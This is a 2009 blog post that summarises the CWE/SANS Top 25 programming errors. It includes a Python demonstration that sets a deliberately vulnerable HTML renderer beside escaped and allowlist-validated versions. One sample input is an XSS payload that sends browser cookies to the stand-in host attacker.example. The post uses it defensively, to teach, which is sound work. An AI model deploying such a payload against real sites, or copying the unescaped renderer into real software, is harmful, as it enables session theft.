Sunday, January 25, 2009
The SANS Institute, together with MITRE, recently released the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors. The list was prepared by experts from more than 30 US and international cyber security organizations, including Symantec, Microsoft and DHS's National Cyber Security Division among others. It enumerates the programming mistakes that most often lead to critical security vulnerabilities.
This list is a great read for anyone involved in software design and development. It not only describes the vulnerabilities each error causes, but also gives design and implementation guidance for preventing them and concrete steps for fixing them where they already exist. Developers can use these fairly extensive prevention and remediation steps to mitigate or eliminate the weaknesses in their systems.
The list is organized in three categories - Insecure Interaction Between Components (9 errors), Risky Resource Management (9 errors) and Porous Defenses (7 errors). Insecure Interaction Between Components includes errors like 'Improper Input Validation', which gives attackers a gateway into your application, and 'Cross-Site Scripting (XSS)', which lets an attacker run script in other users' browsers and steal their session data. Risky Resource Management identifies vulnerabilities caused by 'External Control of Critical State Data', an 'Untrusted Search Path' for resources, and so on. Porous Defenses enumerates missing or misused defensive techniques such as 'Improper Access Control' and 'Hard-Coded Password', among others.
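To make one of those Insecure Interaction errors concrete, here is a small example I wrote for this post (it is not code from the CWE/SANS document). It shows the XSS pattern as a page renderer that writes untrusted input straight into HTML, next to a hardened version that encodes on output, and a stricter version that also validates the input against an allowlist. The template, the allowlist and the sample inputs are all constructed for the demonstration.

```python
"""Added example for this post: Cross-Site Scripting (CWE-79) as a vulnerable
page renderer beside a hardened one, plus input validation (CWE-20) on top.
Not code from the CWE/SANS Top 25 document; template and inputs are constructed."""
import html
import re

# Constructed page template: the query is reflected into the page body.
PAGE_TEMPLATE = "<html><body><h1>Search results for: {query}</h1></body></html>"

# Constructed sample inputs: a benign query and one carrying an XSS payload.
BENIGN_QUERY = "blue widgets"
XSS_QUERY = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'

# Assumed allowlist for this demo: letters, digits, spaces and hyphens, max 64 chars.
QUERY_ALLOWLIST = re.compile(r"[A-Za-z0-9 \-]{1,64}")


def render_vulnerable(query: str) -> str:
    """CWE-79 pattern: untrusted input is interpolated into HTML unchanged,
    so a <script> element in the query becomes part of the page."""
    return PAGE_TEMPLATE.format(query=query)


def render_escaped(query: str) -> str:
    """Hardened: HTML-encode the value so the browser renders it as text.
    quote=True also encodes quotes, which matters inside attribute values."""
    return PAGE_TEMPLATE.format(query=html.escape(query, quote=True))


def render_validated(query: str) -> str:
    """Belt and braces: reject input outside the expected alphabet (CWE-20),
    then still encode on output, since validation alone is not a substitute."""
    if not QUERY_ALLOWLIST.fullmatch(query):
        raise ValueError("query contains characters outside the allowlist")
    return render_escaped(query)


def is_rejected(query: str) -> bool:
    """True if the validating renderer refuses the query."""
    try:
        render_validated(query)
    except ValueError:
        return True
    return False


def contains_script_tag(page: str) -> bool:
    """Crude check used below: did a raw <script> element survive into the output?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(XSS_QUERY))
    print("escaped:   ", render_escaped(XSS_QUERY))
    print("validated rejects payload:", is_rejected(XSS_QUERY))
```

The point of keeping both render_escaped and render_validated is the one the list itself makes: input validation narrows what reaches your code, but output encoding is what actually stops the browser from interpreting the data as markup, so a fix that only does one of the two is incomplete.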
The online version of the list is available on the CWE site (cwe.mitre.org/top25). You can also download the PDF version of the document.